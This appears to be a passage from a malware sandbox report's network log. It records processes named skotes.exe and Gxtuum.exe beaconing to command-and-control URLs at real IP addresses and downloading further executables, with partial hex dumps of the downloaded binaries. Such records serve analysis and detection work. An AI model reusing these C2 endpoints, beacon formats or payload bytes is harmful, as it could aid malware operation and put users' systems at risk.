Dec 22, 2024 02:16:37.421526909 CET	1236	IN	Data Raw: 89 10 89 48 04 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 01 8d 55 f8 83 ec 08 56 ff 75 08 52 ff 50 0c 8b 75 0c 8b 48 04 8b 56 04 8b 49 04 3b 4a 04 75 0f 8b 00 3b 06 75 09 b0 01 5e 8b e5 5d c2 08 00 32 c0 5e 8b e5 5d c2 08 Data Ascii: H]UUVuRPuHVI;Ju;u^]2^]UAVuV;Bu;Eu^]2^]AkFSUkl$jhDdPSX$aF3EVWPEd}CMP}NCsE
Dec 22, 2024 02:16:37.541243076 CET	1236	IN	Data Raw: 00 50 66 0f d6 01 e8 19 7f 02 00 8b 4d fc 83 c4 08 c7 06 98 e1 45 00 8b c6 33 cd 5e e8 c2 6a 02 00 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 4d 85 44 00 64 a1 00 00 00 00 50 83 ec 08 a1 24 61 46 00 33 c5 89 45 f0 56 Data Ascii: PfME3^j]UjhMDdP$aF3EVPEduuEvFVEPjVpMdY^M3Dj]UVj'nMEWVuFF,@vNFyPu^]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49842	185.215.113.43	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:16:41.062256098 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 39 38 30 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019803001&unit=246122658369
Dec 22, 2024 02:16:42.398740053 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:16:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49846	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:16:42.261593103 CET	160	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49851	31.41.244.11	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:16:42.523338079 CET	68	OUT	GET /files/kardanvalov88/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 22, 2024 02:16:43.848618984 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:16:43 GMT Content-Type: application/octet-stream Content-Length: 605696 Last-Modified: Thu, 12 Dec 2024 15:01:10 GMT Connection: keep-alive ETag: "675afab6-93e00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d 93 ba 99 09 f2 d4 ca 09 f2 d4 ca 09 f2 d4 ca 42 8a d7 cb 0c f2 d4 ca 42 8a d1 cb b6 f2 d4 ca 19 76 d7 cb 03 f2 d4 ca 19 76 d0 cb 18 f2 d4 ca 42 8a d2 cb 08 f2 d4 ca 19 76 d1 cb 63 f2 d4 ca 52 9a d5 cb 0b f2 d4 ca 42 8a d0 cb 12 f2 d4 ca 42 8a d5 cb 18 f2 d4 ca 09 f2 d5 ca cf f2 d4 ca 42 77 dd cb 0c f2 d4 ca 42 77 2b ca 08 f2 d4 ca 09 f2 43 ca 08 f2 d4 ca 42 77 d6 cb 08 f2 d4 ca 52 69 63 68 09 f2 d4 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 31 b5 31 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 ee 06 00 00 6c 02 00 00 00 00 00 0c 32 04 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MBBvvBvcRBBBwBw+CBwRichPEd11g")l2@``HtLpp(@@.text> `.rdatad@@.data;@.pdatatLN@@.rsrcH`,@@.relocp2@B
Dec 22, 2024 02:16:43.848639011 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 55 48 8d ac 24 50 fe ff ff 48 81 ec b0 02 00 00 0f 57 c0 0f 11 44 24 30 0f 57 Data Ascii: @UH$PHWD$0WfL$@A H)HL$0g4WD$PWfL$`AHHL$P>4WD$pWfMA HHL$p4WEWfMAHH
Dec 22, 2024 02:16:43.848658085 CET	1236	IN	Data Raw: 4d 90 e8 f0 33 02 00 90 0f 57 c0 0f 11 45 b0 0f 57 c9 66 0f 7f 4d c0 41 b8 20 00 00 00 48 8d 15 f3 ab 07 00 48 8d 4d b0 e8 ca 33 02 00 90 0f 57 c0 0f 11 45 d0 0f 57 c9 66 0f 7f 4d e0 41 b8 06 00 00 00 48 8d 15 c1 ab 07 00 48 8d 4d d0 e8 a4 33 02 Data Ascii: M3WEWfMA HHM3WEWfMAHHM3WEWfMA HHM~3WEWfM AHHMX3WE0WfM@A HHM023WEPWfM`AHHMP3WEp
Dec 22, 2024 02:16:43.848788977 CET	1236	IN	Data Raw: 48 8d 15 d4 a7 07 00 48 8d 4d 70 e8 13 2f 02 00 90 0f 57 c0 0f 11 85 90 00 00 00 0f 57 c9 66 0f 7f 8d a0 00 00 00 41 b8 21 00 00 00 48 8d 15 68 a9 07 00 48 8d 8d 90 00 00 00 e8 e4 2e 02 00 90 0f 57 c0 0f 11 85 b0 00 00 00 0f 57 c9 66 0f 7f 8d c0 Data Ascii: HHMp/WWfA!HhH.WWfA HH.WWfA!H2H.WWfA H{HW.WWf A!HH
Dec 22, 2024 02:16:43.848807096 CET	1236	IN	Data Raw: 8d 4c 24 20 e8 46 2a 02 00 90 0f 57 c0 0f 11 44 24 40 0f 57 c9 66 0f 7f 4c 24 50 41 b8 6d 00 00 00 48 8d 15 67 a6 07 00 48 8d 4c 24 40 e8 1d 2a 02 00 90 0f 57 c0 0f 11 44 24 60 0f 57 c9 66 0f 7f 4c 24 70 41 b8 06 00 00 00 48 8d 15 1e a7 07 00 48 Data Ascii: L$ FWD$@WfL$PAmHgHL$@WD$`WfL$pAHHL$`)WEWfMAmHHM)WEWfMAHHM)WEWfMAjHHM)WEWfMAHeHM\)
Dec 22, 2024 02:16:43.848824024 CET	672	IN	Data Raw: 06 00 48 83 c4 28 e9 3c 0e 04 00 48 8d 0d 19 db 06 00 e9 30 0e 04 00 48 8d 0d b1 da 06 00 e9 24 0e 04 00 48 8b 15 71 d6 08 00 4c 8d 05 2a cf 08 00 4c 89 05 6b d6 08 00 48 85 d2 74 13 48 8b 02 48 63 48 04 4c 89 44 11 50 4c 8b 05 53 d6 08 00 48 8b Data Ascii: H(<H0H$HqL*LkHtHHcHLDPLSHTHtHHcHLDPH(HHH(H(AH/E3HxHH(H(xHHHH(_H(A
Dec 22, 2024 02:16:43.848841906 CET	1236	IN	Data Raw: 06 00 e9 a0 0b 04 00 48 83 ec 28 48 8d 0d 69 d5 08 00 e8 6c 01 04 00 48 8d 0d 3d da 06 00 48 83 c4 28 e9 80 0b 04 00 cc cc cc cc 48 8d 0d 39 da 06 00 e9 70 0b 04 00 cc cc cc cc 48 8d 05 81 e8 08 00 c3 cc cc cc cc cc cc cc cc 4c 89 44 24 18 4c 89 Data Ascii: H(HilH=H(H9pHLD$LL$ SUVWH8IHl$xHHHl$(LLHD$ HHHHH8_^][@SH HHHWHSHHH$HH [HyH
Dec 22, 2024 02:16:43.849088907 CET	1236	IN	Data Raw: cf e8 91 fd ff ff 48 8b 54 24 60 48 83 fa 0f 76 2e 48 ff c2 48 8b 4c 24 48 48 8b c1 48 81 fa 00 10 00 00 72 15 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 77 29 e8 b8 00 04 00 48 8d 05 b1 e2 06 00 48 89 07 0f 11 77 18 48 8b c7 0f 28 Data Ascii: HT$`Hv.HHL$HHHrH'HIH+HHw)HHwH($H_^[/)H\$WH HHHH t(HLH\$0HH _H\$WHPDHHL$ HHJHT$(HPHT$(
Dec 22, 2024 02:16:43.849175930 CET	448	IN	Data Raw: 48 8b c1 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 78 8b d1 48 8d 4c 24 30 e8 d0 ff ff ff 48 8d 54 24 20 48 8d 4c 24 40 0f 10 00 0f 29 44 24 20 e8 b9 fb ff ff 48 8d 15 2a 8f 08 00 48 8d 4c 24 40 e8 08 1e 04 00 cc cc cc cc cc cc cc Data Ascii: HHxHL$0HT$ HL$@)D$ H*HL$@HHAHAHHHHHHL$ HHL$ @SH HHHWHSHHHCHHHHH [3
Dec 22, 2024 02:16:43.849267960 CET	1236	IN	Data Raw: 93 04 00 33 ff 48 89 7b 58 48 8b 4b 48 48 85 c9 74 05 e8 b8 93 04 00 48 89 7b 48 48 8b 4b 38 48 85 c9 74 05 e8 a6 93 04 00 48 89 7b 38 48 8b 4b 28 48 85 c9 74 05 e8 94 93 04 00 48 89 7b 28 48 8b 4b 18 48 85 c9 74 05 e8 82 93 04 00 48 89 7b 18 48 Data Ascii: 3H{XHKHHtH{HHK8HtH{8HK(HtH{(HKHtH{HKHtpH{HH\$0H _AAHDHHH(HIHtHPHtLHH(I H(
Dec 22, 2024 02:16:43.968723059 CET	1236	IN	Data Raw: 10 00 0f 10 48 10 0f 11 46 10 0f 11 4e 20 48 8d 4d 0f e8 38 de 03 00 0f 10 08 0f 10 50 10 f2 0f 10 40 20 8b 48 28 0f 11 4e 30 0f 11 56 40 f2 0f 11 46 50 89 4e 58 48 89 37 48 8d 4d a7 e8 65 c0 03 00 48 8b 4d ff 48 85 c9 74 05 e8 ab 8e 04 00 4c 89 Data Ascii: HFN HM8P@ H(N0V@FPNXH7HMeHMHtLuHMHtLuHMHtLuHMHtuLuHMHtcLuHMHtQLuHML$I[(Is0IA^_]H*@SH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49865	185.215.113.43	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:16:47.694097996 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 39 38 30 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019804001&unit=246122658369
Dec 22, 2024 02:16:49.042620897 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:16:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49866	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:16:48.055377960 CET	312	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Dec 22, 2024 02:16:49.287766933 CET	154	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:16:49 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49872	31.41.244.11	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:16:49.166065931 CET	61	OUT	GET /files/martin/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 22, 2024 02:16:50.948719025 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:16:50 GMT Content-Type: application/octet-stream Content-Length: 4470272 Last-Modified: Sun, 22 Dec 2024 00:33:17 GMT Connection: keep-alive ETag: "67675e4d-443600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 c6 e7 66 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 d4 4e 00 00 c6 74 00 00 32 00 00 00 70 c6 00 00 10 00 00 00 f0 4e 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 a0 c6 00 00 04 00 00 2f 58 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 10 72 00 73 00 00 00 00 00 72 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 56 c6 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 56 c6 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELfg(Nt2pN@/XD@ _rsrVV q(@.rsrcr(@.idata r(@ 8 r(@dsmoqcnp`Z(@yktdnnda`D@.taggant0p"D@
Dec 22, 2024 02:16:50.949004889 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:16:50.949023008 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:16:50.949157000 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:16:50.949173927 CET	896	IN	Data Raw: 43 3a cd ba fe 43 68 b3 bf ca 9f f2 82 2a 2d c6 a5 0e 17 c2 8a f6 65 73 e2 43 a7 6f fd 43 0b eb a9 12 ec 8c e0 02 31 95 91 cf 51 7d 9a c5 f8 c0 cb 43 f9 66 3a 42 66 a2 c0 c8 28 a2 7e c5 10 a3 21 91 2e fb d6 38 51 76 1f 8a fe 75 88 c8 be 83 14 be Data Ascii: C:Ch-esCoC1Q}Cf:Bf(~!.8Qvujibmhqk5EgmLMz%wq3YWv1MZ?2Yf~M[4A1d~]_?BD~mvn<;49\k24{~s{~
Dec 22, 2024 02:16:50.949198008 CET	1236	IN	Data Raw: d4 18 1f 24 33 9e fb c5 c0 68 d0 51 22 80 11 33 00 3e 8f ab a0 5a 6f d2 ed 28 cf 84 ed ae d4 af c5 30 56 2c 21 27 45 a3 09 96 fb 97 65 ae c7 20 bd ea 6d 52 d7 dd 3c 63 57 5a 17 a6 19 de 3e a8 44 6c 47 5a 44 aa 46 1e 94 6e 40 35 38 5a af e1 19 68 Data Ascii: $3hQ"3>Zo(0V,!'Ee mR<cWZ>DlGZDFn@58ZhrG+^/k.2p>Bknmwq]98$Ev%EQhMXIvT^C^YG)jsX1y`J9UVb~WKYVD<vhFK-4f4??DF
Dec 22, 2024 02:16:50.949235916 CET	1236	IN	Data Raw: 7d 4e c7 30 be 88 30 2e 8a 53 72 54 cb 92 80 c5 00 3d 78 35 1a b6 f4 93 1b e9 73 df 54 83 57 14 fe 9e 6b c0 64 ca 4f f2 8a a8 e4 ab d6 7a 9e c6 9e 88 8d c4 95 c4 1f e8 11 94 2e 18 83 af 1c 04 ba 4c e7 7a 6b c1 f3 20 9e c7 9f 0e ef b6 a4 aa 7e 6f Data Ascii: }N00.SrT=x5sTWkdOz.Lzk ~o9Q%?=U`u+v3r+y/aY1.UjxlM$i}F2MOTaF>l-V~a+Rys!\|\|`.%XZ~wD?
Dec 22, 2024 02:16:50.949253082 CET	448	IN	Data Raw: 1a 2f 22 d3 55 e3 af 04 43 e2 39 81 a0 41 79 26 f8 a2 ab e9 f6 dc cc 2b 9b 26 e8 dd 34 7e cc e1 56 36 2b 47 b3 5b fd a2 51 8f 06 05 d5 ad 00 ad 05 3d 03 ae 51 f2 b5 15 74 0b f4 12 c3 4a 49 de 3b 09 12 da 3e 47 6f 6d 15 80 7a 3b 55 fb ea fe 40 4a Data Ascii: /"UC9Ay&+&4~V6+G[Q=QtJI;>Gomz;U@J\|\|FmH"j:jT2Jf\|WwiZc:iQzKKs-QNI~CsiC0.D.@MI<(j#33yTv)FoBG$%$A7@
Dec 22, 2024 02:16:50.949801922 CET	1236	IN	Data Raw: 47 45 7c 9b b1 9b 62 89 56 68 ed a4 25 b8 4d ac f1 2e 4d 7e a7 ea 45 b5 71 9e a5 0e 12 db 21 a4 56 26 41 c2 b7 8a bb c8 13 e6 26 a3 5e b6 b1 43 13 e9 a3 72 10 1a cd 44 55 6e 75 8c fc 33 c4 0c 5b ca 69 ae 29 55 b9 93 92 5c 50 e3 da d9 49 29 53 a0 Data Ascii: GE\|bVh%M.M~Eq!V&A&^CrDUnu3[i)U\PI)S!"/c`<c4LH8.eXr>"Dk<[KoRQF"D`is-hxVx9n<MMKu~1+x_bU'!RVz-XcUEmi7N
Dec 22, 2024 02:16:50.949819088 CET	1236	IN	Data Raw: ce 11 ae 57 7c ea 26 a8 3e 5e 1a 95 22 da 76 a6 3e 4d 4b 40 b1 be 29 34 65 97 26 29 80 06 21 d8 64 9e 6d 5f ac ae 98 1e 6c f7 28 7e a3 dc 4e eb ed 26 85 91 9d d2 48 41 05 8e 5d da 06 54 2b 30 74 22 0a cc 7f ce 50 4a 4a e4 35 f9 5c 0b 0b 76 b1 d4 Data Ascii: W\|&>^"v>MK@)4e&)!dm_l(~N&HA]T+0t"PJJ5\vqOe#WQPV1vz6f&(=T\|]WML?wf.oshM$L?w&fDCu_tG~_V;l\|4=/B,wC=a/0z
Dec 22, 2024 02:16:50.950650930 CET	1236	IN	Data Raw: 39 c4 48 ea 72 38 47 6c 3a b2 f9 8a 72 59 25 85 bc 88 77 df ab 7a d0 41 7e f9 0a 9e c2 dd 69 89 f1 cf c8 f0 7b 94 5e cb 46 c5 57 a6 f1 55 c8 f4 bc a0 54 6c 19 f9 02 99 fd 9e 41 74 2a 7e c0 13 ba 00 4f 4f db 4a 56 49 c6 a2 05 b6 bc 62 a3 6d 9d 86 Data Ascii: 9Hr8Gl:rY%wzA~i{^FWUTlAt~OOJVIbm^}qQwD'KBvgj+Cm@m!2WyY\|<J^),4~;6M6-m9xvwS8`D>xoc]?@+on

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49877	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:16:51.111654043 CET	160	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 22, 2024 02:16:52.439240932 CET	155	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:16:52 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49890	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:16:54.103455067 CET	312	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Dec 22, 2024 02:16:55.433109999 CET	154	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:16:55 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49898	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:16:57.189160109 CET	160	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 22, 2024 02:16:58.508353949 CET	155	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:16:58 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49906	185.215.113.43	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:16:59.984644890 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 39 38 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019805001&unit=246122658369
Dec 22, 2024 02:17:01.316099882 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:17:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49907	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:00.167881966 CET	312	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Dec 22, 2024 02:17:01.499394894 CET	154	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:17:01 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49914	31.41.244.11	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:17:01.471271038 CET	62	OUT	GET /files/unique1/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 22, 2024 02:17:02.799778938 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:17:02 GMT Content-Type: application/octet-stream Content-Length: 4433408 Last-Modified: Sun, 22 Dec 2024 01:09:57 GMT Connection: keep-alive ETag: "676766e5-43a600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 07 98 63 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 4a 49 00 00 4c 75 00 00 32 00 00 00 d0 c5 00 00 10 00 00 00 60 49 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 c6 00 00 04 00 00 39 49 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 